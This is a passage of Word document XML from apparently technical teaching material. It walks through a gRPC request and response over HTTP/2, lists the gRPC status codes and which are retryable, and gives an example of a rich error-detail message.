        <w:t xml:space="preserve">      Bytes 1-4: message length (uint32 big-endian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF5055" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Protobuf binary payload: serialized GetOrderRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B499A6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B647B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2 DATA frame with END_STREAM flag: indicates request body complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA7545" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  (for unary: one DATA frame; for streaming: multiple DATA frames)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1DC04" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3D825A59" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Step 3: TLS + TCP transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD0DA74" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  H2 frames → TLS record → TCP segment → network → server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035970FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195002AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Step 4: Server receives and dispatches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D83C193" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2 server: demultiplexes stream from connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6019D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC server: parse :path → extract service name + method name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2598BC61" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Server interceptor chain: auth → logging → tracing → rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F8EA1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Deserialize: []byte → GetOrderRequest struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FBBF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Invoke: OrderServiceImpl.GetOrder(ctx, request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429ACFF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDE7F10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Step 5: Server sends response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD6D25" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2 HEADERS frame (response headers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D10E04E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    :status: 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7A1590" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    content-type: application/grpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599E74A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc-encoding: identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4AE1A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF2FAA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  HTTP/2 DATA frame:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494537E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    5-byte gRPC prefix + serialized Order binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6953CE3B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B95E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2 HEADERS frame (trailers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7051E0E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc-status: 0 (OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D1984" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc-message: (empty for success)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38A782" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc-status-details-bin: (base64 encoded google.rpc.Status if non-zero)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717EF5CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA88F91" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Trailers: sent as HTTP/2 HEADERS frame with END_STREAM flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13987C47" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="5BE47806" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Step 6: Client receives and deserializes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD5BEA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Parse trailers: check grpc-status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C02C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  If 0 (OK): deserialize DATA frame payload → Order struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2DC1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Return to caller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3263E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3EECF7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Total overhead vs raw socket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7215B4C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC: HTTP/2 framing + gRPC framing + Protobuf = ~50-200 bytes overhead per RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4B8EA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST/JSON: HTTP headers + JSON = ~500-2000 bytes overhead per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F6D0A3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC wins: smaller wire format at both protocol and payload level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEB8B5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC status codes — the error model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0DA22" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED3727" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC status codes (google.rpc.Code):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B697CC1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="38E3CAAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>OK (0):           Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E37BDC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>CANCELLED (1):    Operation cancelled (by caller via context cancellation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53136A0F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>UNKNOWN (2):      Unknown error (catch-all for non-gRPC errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD891B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>INVALID_ARGUMENT (3): Client specified invalid argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A481C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                       (bad request — like HTTP 400)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D29F9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>DEADLINE_EXCEEDED (4): Deadline expired before operation completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358FFA18" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                        (timeout — like HTTP 504)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A2CE1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>NOT_FOUND (5):    Requested entity not found (like HTTP 404)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D189C7D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>ALREADY_EXISTS (6): Entity already exists (like HTTP 409)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74383ED9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>PERMISSION_DENIED (7): Caller lacks permission (like HTTP 403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD00A10" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>RESOURCE_EXHAUSTED (8): Rate limit exceeded or quota exhausted (like HTTP 429)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441ECBC6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>FAILED_PRECONDITION (9): System not in state required for operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C3B1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                          (like HTTP 400 for wrong state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F43BEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>ABORTED (10):     Operation aborted, typically concurrency conflict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ABA0BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>OUT_OF_RANGE (11): Operation outside valid range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41F13C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>UNIMPLEMENTED (12): Method not implemented (like HTTP 501)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD079B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>INTERNAL (13):    Internal error (like HTTP 500)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D94E8C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>UNAVAILABLE (14): Service currently unavailable (like HTTP 503)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A72321" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                  RETRYABLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB93C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>DATA_LOSS (15):   Unrecoverable data loss or corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42607389" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>UNAUTHENTICATED (16): Request not authenticated (like HTTP 401)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D247E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="09ADA176" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Retryable status codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6517DB5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  UNAVAILABLE: server temporarily unavailable → retry with backoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F47AB7E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  RESOURCE_EXHAUSTED: rate limited → retry after Retry-After equivalent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8AF4C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  DEADLINE_EXCEEDED: may or may not be retryable (depends on idempotency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCBD92" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3B6176FC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rich error details (google.rpc.Status + details):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E7F95" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  import "google/rpc/status.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E114F66" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  import "google/rpc/error_details.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191FAE7C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7587E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Status {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEAFC30" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    code: 9 (FAILED_PRECONDITION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D9867D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    message: "Cannot cancel shipped order"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B096D6E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    details: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B81743" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Any {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38613A62" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        type_url: "type.googleapis.com/google.rpc.PreconditionFailure"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509A1AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        value: PreconditionFailure {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8BA4FD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          violations: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51455A85" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            Violation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE8DA2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              type: "ORDER_STATUS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C8093" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              subject: "orders/ord_123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D8A00" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              description: "Order has already been shipped, cannot cancel"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8412EB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED690F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48836A02" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74869D40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B87E0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Any {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA87E4E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        type_url: "type.googleapis.com/google.rpc.Help"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A025FC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        value: Help {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6820851E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">          links: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429FC277" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            Link {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F41EA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              description: "Initiate return instead"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148DB31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              url: "https://docs.example.com/returns"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D9734" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E8CC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          ]</w:t>
      </w:r>
    </w:p>
